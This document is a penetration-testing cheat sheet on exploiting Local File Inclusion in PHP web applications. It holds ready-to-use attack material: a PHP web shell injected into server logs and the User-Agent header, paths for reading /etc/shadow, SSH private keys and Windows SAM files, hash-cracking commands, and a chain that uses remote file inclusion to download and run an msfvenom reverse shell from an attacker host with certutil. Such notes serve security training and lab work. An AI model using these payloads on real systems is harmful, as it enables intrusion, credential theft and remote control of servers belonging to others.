Powered by

# LFI

Goals:

  • Try to read internal/local files
  • Try to read webserver files

# Log Poisoning

If we can access the webserver logs it is possible to get RCE.

# Make the webserver log our php command below
# Using Curl
curl -A "<?php echo shell_exec($_GET['cmd']);?>" http://10-10-23-21.p.thmlabs.com/login.php

# Using Netcat
$ nc -nv 10.10.10.x 80
<?php echo shell_exec($_GET['cmd']);?>

# Access the logs and enter the command for example
http://10.10.10.x:80/index.php?page=C:/xampp/apache/logs/access.log&cmd=whoami

# Proc Environ Injection 

curl http://mywebsite.com/index.php?view=../../../proc/self/environ

If we get a response like HTTP_USER_AGENT="curl/7.57.0"</p> </body> , we can poison the User Agent header. In Burp, change the request like this:

GET /index.php?view=../../../proc/self/environ&cmd=whoami
User-Agent: <?php echo shell_exec($_GET['cmd']);?>

# PHP Filter to read local files 

http://10.10.10.x/index.php?page=php://filter/convert.base64-encode/resource=index
http://10.10.10.x/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php

# Windows System Files 

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

1. Generate a hash file for John using pwdump or samdump2.
pwdump SYSTEM SAM > sam.txt
samdump2 SYSTEM SAM -o sam.txt

2. Then crack it
john --format=NT sam.txt

# Linux Files 

http://url/index.php?page=../../../etc/passwd
http://url/index.php?page=../../../etc/shadow
http://url/index.php?page=../../../home/user/.ssh/id_rsa.pub
http://url/index.php?page=../../../home/user/.ssh/id_rsa
http://url/index.php?page=../../../home/user/.ssh/authorized_keys
# Read cmdline running processes
http://url/index.php?page=../../../proc/self/cmdline
http://url/index.php?page=../../../proc/1/cmdline
http://url/index.php?page=../../../proc/2/cmdline
...
# Quick script to test all processes
for i in $(seq 0 2000); do echo "$1:"; curl http://url/index.php?page=../../../proc/$i/cmdline --output -; echo; done

# Read processes
http://url/index.php?page=../../../proc/self/

More here: https://github.com/D35m0nd142/LFISuite/blob/master/pathtotest.txt

# Apache 

# Apache configuration in Ubuntu
http://url/index.php?page=../../../etc/apache2/sites-available/000-default.conf
http://url/index.php?page=../../../etc/apache2/sites-available/monitors.htb.conf

# LFI to RCE to Shell Trick

This is a combination of LFI and SSRF to RCE.

1 - Check for RCE
Create a file in Kali
phpinfo.php
----------
<?php
phpinfo();
?>
----------

2 - Start Python Webserver
$ python3 -m http.server 80

3 - Use LFI to call Kali webserver
$ curl http://192.168.68.53:8080/site/index.php?page=http://192.168.49.68/phpinfo.php

4 - Get a Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=445 -f exe > shell.exe

Create another PHP file to be executed that will download our reverse shell:
pwn.php
-------
<?php
$exec = system('certutil.exe -urlcache -split -f "http://192.168.49.68/shell.exe" shell.exe', $val);
?>
-------

$ curl http://192.168.68.53:8080/site/index.php?page=http://192.168.49.68/pwn.php

Create a PHP file that will execute the reverse shell:
pwn-execute.php
-------
<?php
$exec = system('shell.exe', $val);
?>
-------

$ nc -lnvp 445
$ curl http://192.168.68.53:8080/site/index.php?page=http://192.168.49.68/pwn-execute.php

© Copyright 2024. Caue All rights reserved.